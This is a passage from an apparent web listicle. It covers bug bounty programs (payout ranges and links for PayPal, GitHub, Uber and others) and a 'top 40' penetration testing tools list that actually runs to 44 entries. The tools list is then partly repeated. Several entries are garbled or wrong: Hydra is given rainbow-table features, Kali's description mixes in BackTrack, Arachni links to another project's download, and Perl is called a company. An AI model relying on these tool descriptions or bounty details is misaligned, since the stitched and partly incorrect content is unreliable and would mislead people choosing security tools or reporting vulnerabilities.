  • Denial of service (DoS)

  • User-defined payload

  • Content spoofing without embedded links/HTML

  • Vulnerabilities which require a jailbroken mobile device, etc.

Minimum Payout: Paypal can pay minimum $50 for finding security vulnerabilities in their system.

Maximum Payout: Maximum payout amount given by Paypal is $10000.

Bounty Link: https://www.paypal.com/us/webapps/mpp/security-tools/reporting-security-issues

18) GitHub

GitHub has run a bug bounty program since 2013. Every successful participant earns points for their vulnerability submissions depending on the severity.

Limitation: The security researcher will receive the bounty only if they respect users' data and don't exploit any issue to produce an attack that could harm the integrity of GitHub's services or information.

Minimum Payout: Github pays a minimum amount of $200 for finding bugs.

Maximum Payout: Github can pay $10000 for finding critical bugs.

Bounty Link: https://bounty.github.com/

19) Uber

Uber's vulnerability rewards program is primarily focused on protecting the data of its users and employees.

Minimum Payout: There is no predetermined minimum amount.

Maximum Payout: Uber will pay you $10,000 for finding critical bug issues.

Bounty Link: https://eng.uber.com/bug-bounty/

20) Magento

Magento's bounty program allows you to report security vulnerabilities in Magento software or websites.

Limitations:

The following security research is not eligible for the bounty:

  • Potential or actual denial of service of Magento applications and systems.

  • Use of an exploit to view data without authorization.

  • Automated/scripted testing of web forms

Minimum Payout: The minimum payout amount for this bounty program is $100.

Maximum Payout: Magento is paying maximum $10,000 for finding critical bugs.

Bounty Link: https://magento.com/security

21) Perl

Perl also runs a bug bounty program. If someone finds a security vulnerability in Perl, they can contact the company.

Minimum Payout: The Company pays a minimum amount of $500.

Maximum Payout: The highest amount given by Perl is $1500.

Bounty Link: http://perldoc.perl.org/perlsec.html#SECURITY-VULNERABILITY-CONTACT-INFORMATION

22) PHP

PHP allows ethical hackers to find bugs in their site.

Limitations: You need to check the list of already reported bugs. If you do not follow this instruction, your bug is not considered.

Minimum Payout: The minimum payout amount is $500.

Maximum Payout: A maximum of $1500 is given by PHP for finding important bugs.

Bounty Link: https://bugs.php.net/report.php?bug_type=Security

23) Starbucks

Starbucks runs a bug bounty program to protect their customers. They encourage researchers to find malicious activity in their networks and web and mobile applications.

Minimum Payout: The minimum amount paid by Starbucks is $100.

Maximum Payout: The maximum amount goes up to $4000.

Bounty Link: https://www.starbucks.com/whitehat

24) AT&T

AT&T also has its bug hunting channel. Developers and security experts can research the various platforms like websites, APIs, and mobile applications.

Minimum Payout: Minimum Amount Paid by them is $500.

Maximum Payout: There is no such upper limit for payout.

Bounty Link: https://bugbounty.att.com/home.php

25) LinkedIn

LinkedIn welcomes individual researchers who contribute their expertise and time to find bugs.

The company will reward you, but neither a minimum nor a maximum amount is fixed for this purpose.

Bounty Link: https://security.linkedin.com/posts/2015/private-bug-bounty-program

26) Paytm

Paytm invites independent security groups or individual researchers to study it across all platforms.

Limitations:

  • Reports that state that software is out of date/vulnerable without a 'Proof of Concept.'

  • XSS issues that affect only outdated browsers.

  • Stack traces that disclose information.

  • Any fraud issues

Minimum Payout: The Company will pay minimum $15 for finding bugs.

Maximum Payout: This company does not fix an upper limit.

Bounty Link: https://paytm.com/offer/bug-bounty/

27) Shopify

Shopify's Whitehat program rewards security researchers for finding severe security vulnerabilities.

Minimum Payout: The minimum amount paid by Shopify is $500.

Maximum Payout: There is no fixed upper limit for paying the bounty.

Bounty Link: https://www.shopify.in/whitehat

28) WordPress

WordPress also welcomes security researchers to report about the bugs that they have found.

Minimum Payout: WordPress Pays $150 minimum for reporting bugs on their site.

Maximum Payout: The company does not fix a maximum limit to pay as bounty.

Bounty Link: https://make.wordpress.org/core/handbook/testing/reporting-bugs/

29) Zomato

Zomato helps security researchers to identify security-related issues with the company's website or apps.

Minimum Payout: Zomato will pay minimum $1000 for finding important bugs.

Maximum Payout: There is no fixed maximum amount.

Bounty Link: https://www.zomato.com/security

30) Tor Project

Tor Project's bug bounty program covers two of its core services: its network daemon and browser.

Limitation: OpenSSL applications are excluded from this scope.

Minimum Payout: The minimum amount paid by them is $100.

Maximum Payout: The Company will pay you maximum $4000.

Bounty Link: No web link available; reports go to security@lists.torproject.org

31) Hackerone

HackerOne is one of the biggest vulnerability coordination and bug bounty platforms. It helps companies protect their consumer data by working with the global research community to find the most relevant security issues. Many known companies like Yahoo, Shopify, PHP, Google, Snapchat, and Wink use this platform to reward security researchers and ethical hackers.

Bounty Link: https://hackerone.com/bug-bounty-programs

32) Bugcrowd

A powerful platform connecting the global security researcher community to the security market. This site aims to provide the right mix and type of researchers suited to the specific website for its worldwide clients. Hackers just need to submit their reports on this site, and if they detect valid bugs, the specific company pays the amount to that person.

Bounty Link: https://www.bugcrowd.com/bug-bounty-list/

40 Best Penetration Testing (Pen Testing) Tools in 2020

Penetration testing tools help in identifying security weaknesses in a network, server or web application. These tools are very useful since they allow you to identify the "unknown vulnerabilities" in software and networking applications that can cause a security breach. Vulnerability Assessment and Penetration Testing (VAPT) tools attack your system from within the network and from outside the network, as a hacker would attack it. If unauthorized access is possible, the system has to be corrected.

Here is a list of the top 40 penetration testing tools.

1) Netsparker

Netsparker is an easy-to-use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as an on-premises and SaaS solution.

Features

  • Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.

  • Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.

  • REST API for seamless integration with the SDLC, bug tracking systems etc.

  • Fully scalable solution. Scan 1,000 web applications in just 24 hours.


2) Acunetix

Acunetix is a fully automated penetration testing tool. Its web application security scanner accurately scans HTML5, JavaScript and single-page applications. It can audit complex, authenticated web apps and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.

Features:

  • Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities

  • Detects over 1200 WordPress core, theme, and plugin vulnerabilities

  • Fast & Scalable – crawls hundreds of thousands of pages without interruptions

  • Integrates with popular WAFs and Issue Trackers to aid in the SDLC

  • Available On Premises and as a Cloud solution.


3) Indusface

Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.

Features

  • Crawler scans single page applications

  • Pause and resume feature

  • Manual PT and Automated scanner reports displayed in the same dashboard

  • Unlimited proof of concept requests offers evidence of reported vulnerabilities and helps eliminate false positive from automated scan findings

  • Optional WAF integration to provide instant virtual patching with Zero False positive

  • Automatically expands crawl coverage based on real traffic data from the WAF systems (in case the WAF is subscribed and used)

  • 24×7 support to discuss remediation guidelines/POC


4) ImmuniWeb

ImmuniWeb is a global provider of web and mobile application penetration testing and security ratings. ImmuniWeb AI Platform enhances human testing with award-winning AI technology to accelerate and expand security testing. ImmuniWeb is recognized by Gartner, Forrester and IDC for rapid, scalable and DevSecOps-enabled penetration testing that greatly surpasses traditional penetration testing approaches.

Features:

  • Rapid delivery SLA

  • Zero False-Positive SLA

  • SANS Top 25 Full Coverage

  • OWASP Top 10 Full Coverage

  • PCI DSS 6.5.1-6.5.11 Full Coverage

  • Tailored Remediation Guidelines

  • 24/7 Access to Our Security Analysts

  • Integration with SDLC & CI/CD Tools

  • One-Click Virtual Patching via WAF


5) PureVPN

PureVPN is an indispensable tool in an ethical hacker's arsenal. You may need it to check targets from different geographies, simulate non-personalized browsing behavior, anonymize file transfers, etc.


Features:

  • No Log VPN with high security and anonymity

  • Very fast speeds with 2000+ servers across continents

  • Based in Hong Kong, it does not store any data.

  • Split tunneling and 5 simultaneous logins

  • 24/7 support

  • Supports Windows, Mac, Android, Linux, iPhone, etc.

  • 300,000+ IPs

  • Port Forwarding, Dedicated IP and P2P Protection

  • 31 Day Money-Back Guarantee


6) Owasp

The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include:

  1. Zed Attack Proxy (ZAP – an integrated penetration testing tool)

  2. OWASP Dependency Check (it scans project dependencies and checks them against known vulnerabilities)

  3. OWASP Web Testing Environment Project (collection of security tools and documentation)

The OWASP Testing Guide gives "best practice" guidance for penetration testing the most common web applications.

Owasp link


7) WireShark

Wireshark is a network analysis tool previously known as Ethereal. It captures packets in real time and displays them in human-readable format. Basically, it is a network packet analyzer which provides minute details about your network protocols, decryption, packet information, etc. It is open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information retrieved via this tool can be viewed through a GUI or through the TTY-mode TShark utility.

Wireshark features include:

  • Live capture and offline analysis

  • Rich VoIP analysis

  • Capture files compressed with gzip can be decompressed on the fly

  • Output can be exported to XML, PostScript, CSV or plain text

  • Multi-platform: runs on Windows, Linux, FreeBSD, NetBSD and many others

  • Live data can be read from Ethernet, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, etc.

  • Decryption support for many protocols, including IPsec, ISAKMP, SSL/TLS, WEP, and WPA/WPA2

  • For quick, intuitive analysis, coloring rules can be applied to packets

  • Reads and writes many different capture file formats

Wireshark Download


8) w3af

w3af is a web application attack and audit framework. It has three types of plugins, discovery, audit and attack, that communicate with each other to find vulnerabilities in a site. For example, a discovery plugin in w3af looks for different URLs to test for vulnerabilities and forwards them to the audit plugin, which then uses these URLs to search for vulnerabilities.

It can also be configured to run as a MITM proxy. Intercepted requests can be sent to the request generator, and manual web application testing can then be performed using variable parameters. It also has features to exploit the vulnerabilities that it finds.

w3af features:

  • Proxy support

  • HTTP response cache

  • DNS cache

  • File uploading using multipart

  • Cookie handling

  • HTTP basic and digest authentication

  • User agent faking

  • Add custom headers to requests

w3af download link


9) Metasploit

Metasploit is the most popular and advanced framework that can be used for pentesting. It is an open source tool based on the concept of an 'exploit', which means you pass code that breaches the security measures and enters a given system. Once in, it runs a 'payload', code that performs operations on the target machine, thus creating the perfect framework for penetration testing. It is a great tool for testing whether the IDS is successful in preventing the attacks that we use to bypass it.

Metasploit can be used on networks, applications, servers, etc. It has a command line and a clickable GUI interface, and works on Apple Mac OS X, Linux and Microsoft Windows.

Features of Metasploit:

  • Basic command line interface

  • Third party import

  • Manual brute forcing

  • Website penetration testing

Metasploit download link


10) Kali

Kali works only on Linux machines. It enables you to create a backup and recovery schedule that fits your needs. It promotes a quick and easy way to find and update the largest database of security penetration testing collections to date. It is the best tool available for packet sniffing and injection. Expertise in the TCP/IP protocol and networking is beneficial while using this tool.

Features:

  • Addition of 64-bit support allows brute force password cracking

  • BackTrack comes with pre-loaded tools for LAN and WLAN sniffing, vulnerability scanning, password cracking, and digital forensics

  • BackTrack integrates with some of the best tools, like Metasploit and Wireshark

  • Besides network tools, it also includes Pidgin, XMMS, Mozilla, K3b, etc.

  • BackTrack supports KDE and GNOME.

Kali download link


11) Samurai framework:

The Samurai Web Testing Framework is penetration testing software. It is supplied as a VirtualBox and VMware image that has been pre-configured to function as a web pen-testing environment.

Features:

  • It is an open source, free-to-use tool

  • It contains the best of the open source and free tools that focus on testing and attacking websites

  • It also includes a pre-configured wiki to set up the central information store during the pen-test

Download link: https://sourceforge.net/projects/samurai/files/


12) Aircrack:

Aircrack is one of the handy tools required in wireless pen testing. It cracks vulnerable wireless connections by recovering WEP, WPA and WPA2 encryption keys.

Features:

  • More cards/drivers supported

  • Supports all types of OS and platforms

  • New WEP attack: PTW

  • Support for WEP dictionary attack

  • Support for Fragmentation attack

  • Improved tracking speed

Download link: https://www.aircrack-ng.org/downloads.html


13) ZAP:

ZAP is one of the most popular open source security testing tools. It is maintained by hundreds of international volunteers. It can help users find security vulnerabilities in web applications during the development and testing phases.

Features:

  • It helps identify the security holes present in the web application by simulating an actual attack

  • Passive scanning analyses the responses from the server to identify certain issues

  • It attempts brute force access to files and directories.

  • Spidering feature helps to construct the hierarchical structure of the website

  • Supplies invalid or unexpected data to crash the application or produce unexpected results

  • Helpful for finding the open ports on the target website

  • It provides an interactive Java shell which can be used to execute BeanShell scripts

  • It is fully internationalized and supports 11 languages

Download link: https://github.com/zaproxy/zaproxy/wiki


14) Sqlmap:

Sqlmap is an open source penetration testing tool. It automates the entire process of detecting and exploiting SQL injection flaws. It comes with many detection engines and features for an ideal penetration test.

Features:

  • Full support for six SQL injection techniques

  • Allows direct connection to the database without passing via a SQL injection

  • Support to enumerate users, password hashes, privileges, roles, databases, tables, and columns

  • Automatic recognition of passwords given in hash formats, and support for cracking them

  • Support to dump database tables entirely or specific columns

  • The users can also select a range of characters from each column's entry

  • Allows establishing a TCP connection between the affected system and the database server

  • Support to search for specific database names, tables or specific columns across all databases and tables

  • Allows executing arbitrary commands and retrieving their standard output on the database server

Download link: https://github.com/sqlmapproject/sqlmap


15) Sqlninja:

Sqlninja is a penetration testing tool. It is aimed at exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as the back-end. It also provides remote access to the vulnerable DB server, even in a very hostile environment.

Features:

  • Fingerprinting of the remote SQL Server

  • Data extraction, time-based or using DNS tunnel

  • Allows integration with Metasploit3 to obtain graphical access to the remote DB server

  • Upload of executables using only normal HTTP requests, via VBScript or debug.exe

  • Direct and reverse bindshell, both for TCP and UDP

  • Creation of a custom xp_cmdshell if the original one is not available on w2k3, using token kidnapping

Download link: http://sqlninja.sourceforge.net/download.html


16) BeEF:

BeEF, the Browser Exploitation Framework, is a pen testing tool that focuses on the web browser. It uses GitHub to track issues and host its git repository.

Features:

  • It allows checking the actual security posture by using client-side attack vectors

  • BeEF can hook one or more web browsers. They can then be used for launching directed command modules and further attacks on the system.

Download link: http://beefproject.com


17) Dradis:

Dradis is an open source framework for penetration testing. It allows maintaining information that can be shared among the participants of a pen-test. The information collected helps users understand what is completed and what still needs to be completed.

Features:

  • Easy process for report generation

  • Support for attachments

  • Seamless collaboration

  • Integration with existing systems and tools using server plugins

  • Platform independent

Download link: https://dradisframework.com/ce


18) Rapid 7:

Nexpose by Rapid7 is a useful vulnerability management software. It monitors exposures in real time and adapts to new threats with fresh data, which helps users act at the moment of impact.

Features:

  • Get a Real-Time View of Risk

  • It brings innovative and progressive solutions that help users get their jobs done

  • Know Where to Focus

  • Bring More to Your Security Program

Download link: https://www.rapid7.com/products/nexpose/download/


19) Hping:

Hping is a TCP/IP packet analyzer and pen testing tool. Its interface is inspired by the ping(8) UNIX command. It supports the TCP, ICMP, UDP, and RAW-IP protocols.

Features:

  • Allows firewall testing

  • Advanced port scanning

  • Network testing, using different protocols, TOS, fragmentation

  • Manual path MTU discovery

  • Advanced traceroute with all the supported protocols

  • Remote OS fingerprinting & uptime guessing

  • TCP/IP stacks auditing

Download link: https://github.com/antirez/hping


20) SuperScan:

Superscan is a free Windows-only closed-source penetration testing tool. It also includes networking tools such as ping, traceroute, whois and HTTP HEAD.

Features:

  • Superior scanning speed

  • Support for unlimited IP ranges

  • Improved host detection using multiple ICMP methods

  • Provides support for TCP SYN scanning

  • Simple HTML report generation

  • Source port scanning

  • Extensive banner grabbing

  • Large built-in port list description database

  • IP and port scan order randomization

  • Extensive Windows host enumeration capability

Download link: https://www.mcafee.com/in/downloads/free-tools/termsofuse.aspx


21) ISS Scanner:

The IBM Internet Scanner is a pen testing tool which offers the foundation for effective network security for any business.

Features:

  • Internet Scanner minimizes business risk by finding the weak spots in the network

  • It allows automating scans and discovering vulnerabilities

  • Internet Scanner cuts the risk by identifying the security holes, or vulnerabilities, in the network

  • Complete Vulnerability Management

  • Internet Scanner can identify more than 1,300 types of networked devices

Download link: https://www-01.ibm.com/software/info/trials


22) Scapy:

Scapy is a powerful and interactive pen testing tool. It can handle many classical tasks like scanning, probing, and attacks on the network.

Features:

  • It performs specific tasks like sending invalid frames and injecting 802.11 frames. It combines techniques in ways which are hard to do with other tools

  • It allows users to build exactly the packets they want

  • Reduces the number of lines written to execute the specific code

Download link: http://secdev.org/projects/scapy/


23) IronWASP:

IronWASP is open source software for web application vulnerability testing. It is designed to be customizable so that users can create their own custom security scanners using it.

Features:

  • GUI based and very easy to use

  • It has a powerful and effective scanning engine

  • Support for recording login sequences

  • Reporting in both HTML and RTF formats

  • Checks for over 25 types of web vulnerabilities

  • Support for detecting false positives and false negatives

  • It supports Python and Ruby

  • Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET

Download link: http://ironwasp.org/download.html


24) Ettercap:

Ettercap is a comprehensive pen testing tool. It supports active and passive dissection. It also includes many features for network and host analysis.

Features:

  • It supports active and passive dissection of many protocols

  • ARP poisoning feature to sniff on a switched LAN between two hosts

  • Characters can be injected into a server or to a client while maintaining a live connection

  • Ettercap is capable of sniffing an SSH connection in full duplex

  • Allows sniffing of HTTP SSL-secured data even when the connection is made through a proxy

  • Allows creation of custom plugins using Ettercap's API

Download link: https://ettercap.github.io/ettercap/downloads.html


25) Security Onion:

Security Onion is a penetration testing tool. It is used for intrusion detection and network security monitoring. Its easy-to-use setup wizard allows users to build an army of distributed sensors for their enterprise.

Features:

  • It is built on a distributed client-server model

  • Network Security Monitoring allows monitoring for security-related events

  • It offers full packet capture

  • Network-based and host-based intrusion detection systems

  • It has a built-in mechanism to purge old data before the storage device fills to capacity

Download link: https://securityonion.net/


26) Personal Software Inspector:

Personal Software Inspector is an open source computer security solution. This tool can identify vulnerabilities in applications on a PC or a Server.

Features:

  • It is available in eight different languages

  • Automates the updates for insecure programs

  • It covers thousands of programs and automatically detects insecure programs

  • This pen testing tool automatically and regularly scans the PC for vulnerable programs

  • Detects and notifies programs that can't be automatically updated

Download link: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector


27) HconSTF:

HconSTF is an open source penetration testing tool based on different browser technologies. It assists any security professional in penetration testing. It contains web tools which are powerful for XSS, SQL injection, CSRF, Trace XSS, RFI, LFI, etc.

Features:

  • Categorized and comprehensive toolset

  • Every option is configured for penetration testing

  • Specially configured and enhanced for gaining solid anonymity

  • Works for web app testing assessments

  • Easy-to-use and collaborative operating system

Download link: http://www.hcon.in/


28) IBM Security AppScan:

IBM Security AppScan helps to enhance web application security and mobile application security. It improves application security and strengthens regulatory compliance. It helps users to identify security vulnerabilities and generate reports.

Features:

  • Enables Development and QA to perform testing during the SDLC process

  • Control what applications each user can test

  • Easily distribute reports

  • Increase visibility and better understand enterprise risks

  • Focus on finding and fixing issues

  • Control the access of information

Download link: http://www-03.ibm.com/software/products/en/appscan


29) Arachni:

Arachni is an open source, Ruby framework-based tool for penetration testers and administrators. It is used for evaluating the security of modern web applications.

Features:

  • It is a versatile tool, so it covers a large number of use cases, ranging from a simple command line scanner utility to a global high-performance grid of scanners

  • Options for multiple deployments

  • It offers a verifiable, inspectable code base to ensure the highest level of protection

  • It can easily integrate with a browser environment

  • It offers highly detailed and well-structured reports

Download link: https://sourceforge.net/projects/safe3wvs/files


30) Websecurify:

Websecurify is a powerful security testing environment. It has a user-friendly interface which is simple and easy to use. It offers a combination of automatic and manual vulnerability testing technologies.

Features:

  • Good testing and scanning technology

  • Strong testing engine to detect URLs

  • It is extensible with many available add-ons

  • It is available for all the major desktop and mobile platforms

Download link: https://www.websecurify.com/


31) Vega:

Vega is an open source web security scanner and pen testing platform to test the security of web applications.

Features:

  • Automated, Manual, and Hybrid Security Testing

  • It helps users find vulnerabilities such as cross-site scripting, stored cross-site scripting, blind SQL injection, shell injection, etc.

  • It can automatically log into websites when supplied with user credentials

  • It runs effectively on Linux, OS X, and Windows

  • Vega detection modules are written in JavaScript

Download link: https://subgraph.com/vega/download/index.en.html


32) Wapiti:

Wapiti is another famous penetration testing tool. It allows auditing the security of the web applications. It supports both GET and POST HTTP methods for the vulnerability check.

Features:

  • Generates vulnerability reports in various formats

  • It can suspend and resume a scan or an attack

  • Fast and easy way to activate and deactivate attack modules

  • Supports HTTP and HTTPS proxies

  • It allows restraining the scope of the scan

  • Automatic removal of a parameter in URLs

  • Import of cookies

  • It can activate or deactivate SSL certificate verification

  • Extract URLs from Flash SWF files

Download link: https://sourceforge.net/projects/wapiti/files/


33) Kismet:

Kismet is a wireless network detector and intrusion detection system. It works with Wi-Fi networks but can be expanded via plugins to handle other network types.

Features:

  • Allows standard PCAP logging

  • Client/Server modular architecture

  • Plug-in architecture to expand core features

  • Multiple capture source support

  • Distributed remote sniffing via lightweight remote capture

  • XML output for integration with other tools

Download link: https://www.kismetwireless.net/download.shtml


34) Kali Linux:

Kali Linux is an open source pen testing tool which is maintained and funded by Offensive Security.

Features:

  • Full customization of Kali ISOs with live-build to create customized Kali Linux images

  • It contains a number of metapackage collections which aggregate different tool sets

  • ISO of Doom and Other Kali Recipes

  • Disk Encryption on Raspberry Pi 2

  • Live USB with Multiple Persistence Stores

Download link: https://www.kali.org/


35) Parrot Security:

Parrot Security is a pen testing tool. It offers a fully portable laboratory for security and digital forensics experts. It also helps users protect their privacy with anonymity and crypto tools.

Features:

  • It includes a full arsenal of security-oriented tools to perform penetration tests, security audits and more

  • It comes with preinstalled, useful and updated libraries

  • Offers powerful worldwide mirror servers

  • Allows community-driven development

  • Offers separate Cloud OS specifically designed for servers

Download link: https://www.parrotsec.org/download.fx


36) OpenSSL:

This toolkit is licensed under an Apache-style license. It is a free and open source project that provides a full-featured toolkit for the TLS and SSL protocols.

Features:

  • It is written in C, but wrappers are available for many computer languages

  • The library includes tools for generating RSA private keys and Certificate Signing Requests

  • Verifies CSR files

  • Completely removes the passphrase from a key

  • Creates a new private key and a Certificate Signing Request

Download link: https://www.openssl.org/source/


37) Snort:

Snort is an open-source intrusion detection and pen testing system. It offers the benefits of signature-, protocol- and anomaly-based inspection methods. This tool helps users get maximum protection from malware attacks.

Features:

  • Snort gained notoriety for being able to detect threats accurately at high speed

  • Protect your workspace from emerging attacks quickly

  • Snort can be used to create customized unique network security solutions

  • Tests the SSL certificate of a particular URL

  • It can check if a particular cipher is accepted on a URL

  • Verifies the certificate signer authority

  • Ability to submit false positives/negatives

Download link: https://www.snort.org/downloads


38) Backbox:

BackBox is an open source community project with the objective of enhancing the culture of security in IT environments. It is available in two variants, BackBox Linux and BackBox Cloud. It includes some of the most commonly known and used security and analysis tools.

Features:

  • It is a helpful tool to reduce company resource needs and lower the cost of managing multiple network device requirements

  • It is a fully automated pen testing tool, so no agents and no network configuration changes are needed in order to perform scheduled automated configuration

  • Secure Access to Devices

  • Organizations can save time as there is no need to track individual network devices

  • Supports Credential and Configuration File Encryption

  • Self-Backup and Automatic Remote Storage

  • Offers IP Based Access Control

  • No need to write commands, as it comes with pre-configured commands

Download link: https://backbox.org/download


39) THC Hydra:

Hydra is a parallelized login cracker and pen testing tool. It is very fast and flexible, and new modules are easy to add. This tool allows researchers and security consultants to find where unauthorized access is possible.

Features:

  • Full time-memory trade-off tool suite, including rainbow table generation, sorting, conversion and lookup

  • It supports rainbow tables of any hash algorithm

  • Supports rainbow tables of any charset

  • Supports rainbow tables in compact or raw file format

  • Support for computation on multi-core processors

  • Runs on Windows and Linux operating systems

  • Unified rainbow table file format on all supported operating systems

  • Supports GUI and command line user interfaces

Download link: https://github.com/vanhauser-thc/thc-hydra


40) Reputation Monitor Alert:

Open Threat Exchange Reputation Monitor is a free service. It allows professionals to track their organization's reputation. With the help of this tool, businesses and organizations can track the public IP and domain reputation of their assets.

Features:

  • Monitors cloud, hybrid cloud, and on-premises infrastructure

  • Delivers continuous threat intelligence to keep you updated about threats as they emerge

  • Provides the most comprehensive threat detection and actionable incident response directives

  • Deploys quickly, easily, and with less effort

  • Reduces TCO over traditional security solutions

Download link: https://www.alienvault.com/try-it-free?utm_internal=sb_freetrial_modal


41) John the Ripper:

John the Ripper, known as JTR, is a very popular password cracking tool. It is primarily used to perform dictionary attacks. It helps identify weak password vulnerabilities in a network. It also supports brute force and rainbow crack attacks.

Features:

  • John the Ripper is free and open source software

  • Proactive password strength checking module

  • It allows online browsing of the documentation

  • Support for many additional hash and cipher types

  • Allows browsing the documentation online, including a summary of changes between two versions

Download link: http://www.openwall.com/john/


42) Safe3 scanner:

Safe3WVS is one of the most powerful web vulnerability testing tools. It comes with web spider crawling technology, especially for web portals. It is the fastest tool for finding issues like SQL injection, upload vulnerabilities, and more.

Features:

  • Full support for Basic, Digest and HTTP authentication

  • Intelligent web spider automatically removes repeated web pages

  • An automatic JavaScript analyzer provides support for extracting URLs from Ajax, Web 2.0 and any other applications

  • Support for scanning for SQL injection, upload vulnerabilities, admin path and directory listing vulnerabilities

Download link: https://sourceforge.net/projects/safe3wvs/files/latest/download


43) CloudFlare:

CloudFlare is a CDN with robust security features. Online threats range from comment spam and excessive bot crawling to malicious attacks like SQL injection, and CloudFlare provides protection against all of these.

Features:

  • It is an enterprise-class DDoS protection network

  • Its web application firewall benefits from the collective intelligence of the entire network

  • Registering domain using CloudFlare is the most secure way to protect from domain hijacking

  • The Rate Limiting feature protects users' critical resources. It blocks visitors with suspicious request rates.

  • CloudFlare Orbit solves security issues for IoT devices

Download link: https://www.cloudflare.com/


44) Zenmap

Zenmap is the official GUI for the Nmap Security Scanner. It is a multi-platform, free and open source application. It is easy to use for beginners but also offers advanced features for experienced users.

Features:

  • Interactive and graphical results viewing

  • It summarizes details about a single host or a complete scan in a convenient display.

  • It can even draw a topology map of discovered networks.

  • It can show the differences between two scans.

  • It allows administrators to track new hosts or services appearing on their networks, or existing services that go down

Download link: https://nmap.org/download.html

Other tools that might be useful for penetration testing are:

  • Acunetix: It is a web vulnerability scanner targeted at web applications. It is an expensive tool compared to others and provides facilities like cross-site scripting testing, PCI compliance reports, SQL injection testing, etc.

  • Retina: It is more like a vulnerability management tool than a pen-testing tool

  • Nessus: It concentrates on compliance checks, sensitive data searches, IP scans, website scanning, etc.

  • Netsparker: This tool comes with a robust web application scanner that identifies vulnerabilities and suggests solutions. Free limited trials are available, but most of the time it is a commercial product. It also helps to exploit SQL injection and LFI (Local File Inclusion)

  • CORE Impact: This software can be used for mobile device penetration, password identification and cracking, network device penetration, etc. It is one of the more expensive tools in software testing

  • Burp Suite: Like the others, this software is also a commercial product. It works as an intercepting proxy and offers web application scanning, crawling of content and functionality, etc. The advantage of using Burp Suite is that you can use it on Windows, Linux and Mac OS X environments.

40 Best Penetration Testing (Pen Testing) Tools in 2020

Penetration Testing tools help in identifying security weaknesses ing a network, server or web application. These tools are very useful since they allow you to identify the "unknown vulnerabilities" in the software and networking applications that can cause a security breach. Vulnerability Assessment and Penetration Testing (VAPT) Tools attack your system within the network and outside the network as if an hacker would attack it. If the unauthorized access is possible, the system has to be corrected.

 

Here is a list of top 40 Penetration Testing Tools

1) Netsparker

Netsparker is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution.

 

Features

  • Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology.

  • Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages.

  • REST API for seamless integration with the SDLC, bug tracking systems etc.

  • Fully scalable solution. Scan 1,000 web applications in just 24 hours.


2) Acunetix

Acunetix is a fully automated penetration testing tool. Its web application security scanner accurately scans HTML5, JavaScript and Single-page applications. It can audit complex, authenticated webapps and issues compliance and management reports on a wide range of web and network vulnerabilities, including out-of-band vulnerabilities.

 

Features:

  • Scans for all variants of SQL Injection, XSS, and 4500+ additional vulnerabilities

  • Detects over 1200 WordPress core, theme, and plugin vulnerabilities

  • Fast & Scalable – crawls hundreds of thousands of pages without interruptions

  • Integrates with popular WAFs and Issue Trackers to aid in the SDLC

  • Available On Premises and as a Cloud solution.


3) Indusface

Indusface WAS offers manual Penetration testing and automated scanning to detect and report vulnerabilities based on OWASP top 10 and SANS top 25.

 

Features

  • Crawler scans single page applications

  • Pause and resume feature

  • Manual PT and Automated scanner reports displayed in the same dashboard

  • Unlimited proof of concept requests offers evidence of reported vulnerabilities and helps eliminate false positive from automated scan findings

  • Optional WAF integration to provide instant virtual patching with Zero False positive

  • Automatically expands crawl coverage based on real traffic data from the WAF systems (incase WAF is subscribed and used)

  • 24×7 support to discuss remediation guidelines/POC


4) ImmuniWeb

ImmuniWeb is a global provider of web and mobile application penetration testing and security ratings. ImmuniWeb AI Platform enhances human testing with award-winning AI technology to accelerate and expand security testing. ImmuniWeb is recognized by Gartner, Forrester and IDC for rapid, scalable and DevSecOps-enabled penetration testing that greatly surpasses traditional penetration testing approaches.

 

Features:

  • Rapid delivery SLA

  • Zero False-Positive SLA

  • SANS Top 25 Full Coverage

  • OWASP Top 10 Full Coverage

  • PCI DSS 6.5.1-6.5.11 Full Coverage

  • Tailored Remediation Guidelines

  • 24/7 Access to Our Security Analysts

  • Integration with SDLC & CI/CD Tools

  • One-Click Virtual Patching via WAF


5) PureVPN

PureVPN is an indispensable tool in an Ethical hackers arsenal. You may need it to check target in different geographies, simulate nonpersonalized browsing behavior, anonymized file transfers, etc.

 

Features:

  • No Log VPN with high security and anonymity

  • Very fast speeds with 2000+ servers across continents

  • Based in Hongkong, it does not store any data.

  • Split tunneling and 5 simultaneous logins

  • 24/7 support

  • Supports Windows, Mac, Android, Linux, iPhone, etc.

  • 300,000+ IPs

  • Port Forwarding, Dedicated IP and P2P Protection

  • 31 Day Money-Back Guarantee


6) OWASP

The Open Web Application Security Project (OWASP) is a worldwide non-profit organization focused on improving the security of software. The project has multiple tools to pen test various software environments and protocols. Flagship tools of the project include

  1. Zed Attack Proxy (ZAP – an integrated penetration testing tool)

  2. OWASP Dependency Check (it scans project dependencies and checks them against known vulnerabilities)

  3. OWASP Web Testing Environment Project (collection of security tools and documentation)

The OWASP Testing Guide gives "best practice" guidance for penetration testing the most common web applications.

OWASP link


7) WireShark

Wireshark is a network analysis tool previously known as Ethereal. It captures packets in real time and displays them in a human-readable format. Basically, it is a network packet analyzer which provides minute details about your network protocols, decryption, packet information, etc. It is open source and can be used on Linux, Windows, OS X, Solaris, NetBSD, FreeBSD and many other systems. The information retrieved via this tool can be viewed through the GUI or the TTY-mode TShark utility.

WireShark features include

  • Live capture and offline analysis

  • Rich VoIP analysis

  • Capture files compressed with gzip can be decompressed on the fly

  • Output can be exported to XML, PostScript, CSV or plain text

  • Multi-platform: runs on Windows, Linux, FreeBSD, NetBSD and many others

